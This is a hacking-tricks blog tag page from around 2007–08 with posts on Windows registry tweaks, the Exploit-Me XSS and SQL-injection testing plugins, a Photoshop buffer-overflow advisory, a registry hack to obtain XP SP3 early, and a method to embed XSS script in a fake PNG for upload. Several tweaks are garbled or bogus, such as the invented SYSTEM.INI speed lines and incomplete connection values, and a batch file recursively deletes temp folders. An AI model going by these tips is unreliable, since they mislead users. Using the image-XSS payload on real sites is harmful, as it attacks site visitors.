Posts Tagged ‘hacking tricks

02
Feb
08

10 Registry Hack

FISRT MAKE THIS
================
OPEN THE notepad
AND TYPE THIS

@echo off
del /s /f /q c:\windows\temp\*.*
rd /s /q c:\windows\temp
md c:\windows\temp
del /s /f /q C:\WINDOWS\Prefetch
del /s /f /q %temp%\*.*
rd /s /q %temp%
md %temp%
cls
THEN SAVE IT AS CLEAN.BAT

THEN RUN IT

——————————————-
PC MORE FASTER MORE THAN BEFORE
================================
HKEY_CURRENT_USER\Control Panel\Desktop
then select
MenuShowDelay
change 400 to 0

——————————————
MAKE COPY EASY N FASTER
==========================
HKEY_CURRENT_USER\Control Panel\Desktop
then change PaintDesktopVersion from 0 to1

———————————————–
CHANGE THE ORGANIZATION OR THE OWNER NAMES
========================================
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion
then on RegisteredOrganization and RegisteredOwner
you can type any thing you want

—————————————————-

MAKE APPLICATION OPEN MORE POWER
===========================================
HKEY_CLASSES_ROOT\exefile
then right click on shell and make new key and putit name is
high priority
and then click on high priority and make new key and put it name is
command
and in the other side modify the value to
c:\WINDOWS\System32\cmd.exe /c start “runhigh” /high “%1

——————————————————-

MAKE A COPY TO FOLDER AND MOVE TO FOLDER IN CONTEXT MENU OPTION
===================================
HKEY_CLASSES_ROOT\AllFilesystemObjects\shellex
AND ON THE “ContextMenuHandlers”
RIGHT CLICK AND MAKE A NEW KEY AND NAME IT “COPY TO FOLDER…”
THEN IN OTHER SIDE DOUBLE CLICK AND PUT THE FOLLWING
{C2FBB630-2971-11d1-A18C-00C04FD75D13}
REPET ONE MORE AND MAKE NEW KEY BUT TIS TIME NAME IT TO ” MOVE TO FOLDER…”
{C2FBB631-2971-11d1-A18C-00C04FD75D13}

AND RESTART THE PC

————————————————————
INCREASE YOUR CONNECTION
========================
HKEY_CURRENT_USER\Software\Microsoft\Windows\Curre ntVersion\Internet Settings

then make 3 new values
MaxConnectionsPer1_0Server value (a)
MaxConnectionsPer1_0Server value (b)
MaxConnectionsPerServer value (a)-

——————————–
START MENU
===========
RUN
TYPE “SYSTEM.INI”
AND IN THE END
PUT THE FOLLWING

page buffer=100000kbps
load=100000kbps
Download=100000kbps
save=100000kbps
back=100000kbps

——————————————————–
PUT YOU NAME ON WINDOW TITLE
===============================

HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main
and type
WINDOW TITLE
================================================== =====

or you can share another trick to me??

Advertisements
06
Dec
07

exploit mE : sql inject-me & xss-me Plugin

Security Compass announces the release of the open source Firefox plugins for web application penetration testing at the SecTor conference in Toronto.

exploit mE is A suite of Firefox web application security testing tools. Exploit-Me tools are designed to be lightweight and easy to use. Instead of using proxy tools like many web application testing tools, Exploit-Me integrates directly with Firefox.

XSS-mE

The tool works by submitting your HTML forms and substituting the form value with strings that are representative of an XSS attack.

If the resulting HTML page sets a specific JavaScript value (document.vulnerable=true) then the tool marks the page as vulnerable to the given XSS string.

The tool does not attempting to compromise the security of the given system. It looks for possible entry points for an attack against the system. There is no port scanning, packet sniffing, password hacking or firewall attacks done by the tool.

You can think of the work done by the tool as the same as the QA testers for the site manually entering all of these strings into the form fields.

The Cross-Site Script Me (XSS-Me) tool allows the user to test their web applications against common XSS vulnerabilities. The Beta2 release corrects an issue with the plugin failing to work with Firefox 2.0.0.10.

XSS-Me 0.2 is available here.

SQL INJECT-mE

SQL Inject Me is the Exploit-Me tool used to test for SQL Injection vulnerabilities.

The tool work by submitting your HTML forms and substituting the form value with strings that are representative of an SQL Injection attack.

The tool works by sending database escape strings through the form fields. It then looks for database error messages that are output into the rendered HTML of the page.

The tool does not attempting to compromise the security of the given system. It looks for possible entry points for an attack against the system. There is no port scanning, packet sniffing, password hacking or firewall attacks done by the tool.

You can think of the work done by the tool as the same as the QA testers for the site manually entering all of these strings into the form fields.

SQL Inject-Me 0.2 is available here.

03
Dec
07

Hacking : Adobe Photoshop CS2 / CS3 File Buffer Overflow

A “highly-critical” security flaw in Adobe Photoshop CS2 and CS3 that could allow remote hackers to access your computer has been reported by security company Secunia.

The flaw involves the way that Photoshop processes bitmap files, such as BMP, DIB and RLE, and allow malicious coders to launch buffer overflow attacks.A buffer overflow attack is where a hacker purposely causes a program to experience an error, so that they can insert their own code, which is then executed.The flaw was discovered by French security researcher “Marsu”, who tested it against Windows XP SP2.

Marsu has discovered a vulnerability in Adobe Photoshop, which can be exploited by malicious people to compromise a user’s system.he vulnerability is caused due to an error within the BMP.8BI Photoshop Format Plugin when handling Bitmap files (e.g. .BMP, .DIB, .RLE). This can be exploited to cause a stack-based buffer overflow via a specially crafted Bitmap file.Successful exploitation allows execution of arbitrary code.

The vulnerability is confirmed in Adobe Photoshop CS2 and reportedly affects Adobe Photoshop CS3. Other versions may also be affected.

While code has been published by MilwOrm to demonstrate how the flaw can be exploited.

 

 

Continue reading ‘Hacking : Adobe Photoshop CS2 / CS3 File Buffer Overflow’

27
Nov
07

Get Windows XP SP3 FREE Through Windows Update

this is really good one, we can get windows SP 3 for free through windows update, i’m haven’t try this one yet but it’s look like gonna work. this is the step :

  • Download this file ( WindowsXPSP3Hack.cmd ). Once you have downloaded the file, login as administrator and run the file by double clicking it. Wait for the Confirmation Message on screen.
  • The Above file adds a few entries to the Windows Registry that makes Microsoft think that you are a part of the Private beta program.
  • Check for new updates on Windows Update. You should now see Windows XP SP3 listed in the available updates.
  • Download and install it. Reboot whenever necessary.

Continue reading ‘Get Windows XP SP3 FREE Through Windows Update’

22
Nov
07

embed script to image

i watch vidoe that teach another way to embed code to images, like we know there are some tools to embed script or comment into images like this one but this one is another way to embed xss script into images.

first open new shell n write this

echo -en "\x89\x50\x4E\x47\x0D\x0A\x1A\x0A\x00\x00\x00\x0DPHCK\x00\x00\x00\x01\x00\x00\x00\x01" > images.png

enter your code like this :

echo -n "<hml><body><script>alert('wicux ngetes');</script></body></html>" >> iamges.png

how to test it??

1.upload your images

2.press Ctrl + U to show the page source and find the path of your picture

3.copy the path and add it to the url example : http://taek.com/imagespath/images.png

4.u’r script will run